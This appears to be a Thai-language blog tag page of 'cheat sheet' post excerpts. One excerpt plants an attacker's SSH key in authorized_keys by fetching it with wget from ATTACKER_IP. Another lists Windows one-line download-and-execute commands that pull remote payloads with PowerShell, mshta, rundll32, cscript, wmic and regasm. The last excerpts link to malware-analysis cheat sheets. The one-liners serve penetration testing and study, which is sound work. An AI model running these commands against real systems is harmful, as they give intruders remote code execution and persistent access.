Posts by tag
cheat sheet
Source:: https://github.com/ansjdnakjdnajkd/iOS
ก่อนหน้านี้เราพูดถึงการทำ Privilege Escalation ด้วย sudo และ exploit path กันมาแล้ว วันนี้ก็เลยเอาอันอื่นๆที่จำเป็นเมื่อทำ post exploitation ใน Linux มารวมไว้ครับ 1. Add public key ไว้ใน authorised key เพื่อให้สามารถ login ได้
2. การรัน shell ผ่านคำสั่งต่างๆ…
1 |
echo $(wget https://ATTACKER_IP/.ssh/id_rsa.pub) >> ~/.ssh/authotized_keys |
โพสต์นี้ไม่มีอะไรมาก เพียงแต่ไปเจอ list command สำหรับการ download & execute ไฟล์ใน Windows แบบเป็น oneline คือ 1 บรรทัดแล้วจบเลย ก็เลยจะเอามาโน็ตไว้เผื่อจะใช้ในอนาคตครับ Powershell
Cmd
Cscript
Mshta
Rundll32
WMIC
Regasm/Regsvc
…
1 2 3 4 |
//ผ่านเว็บปกติ powershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('http://webserver/payload.ps1')|iex" // ผ่าน webdav powershell -exec bypass -f \\webdavserver\folder\payload.ps1 |
1 |
cmd.exe /k < \\webdavserver\folder\batchfile.txt |
1 |
cscript //E:jscript \\webdavserver\folder\payload.txt |
1 2 3 |
mshta vbscript:Close(Execute("GetObject(""script:http://webserver/payload.sct"")")) mshta http://webserver/payload.hta mshta \\webdavserver\folder\payload.hta |
1 2 |
rundll32 \\webdavserver\folder\payload.dll,entrypoint rundll32.exe javascript:"\..\mshtml,RunHTMLApplication";o=GetObject("script:http://webserver/payload.sct");window.close(); |
1 |
wmic os get /format:"https://webserver/payload.xsl" |
1 |
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe /u \\webdavserver\folder\payload.dll |
หลังจากก่อนหน้านี้ Zeltser ออก Cheat Sheet สำหรับ Analysis Malicious Document และ Analysis Malware มาแล้ว ล่าสุดก็ออก Cheat Sheet สำหรับ Reverse Engineering Malicious Code ครับ PDF
ก่อนหน้านี้เคยออก Cheat Sheet สำหรับทำ Malware Analysis ไปแล้ว มาคราวนี้เป็น Malicious Document Analysis กันบ้างครับ Link
Zeltser แจก PDF สรุปการทำ malware analysis ครับ PDF Source:: SANS
Recent Comments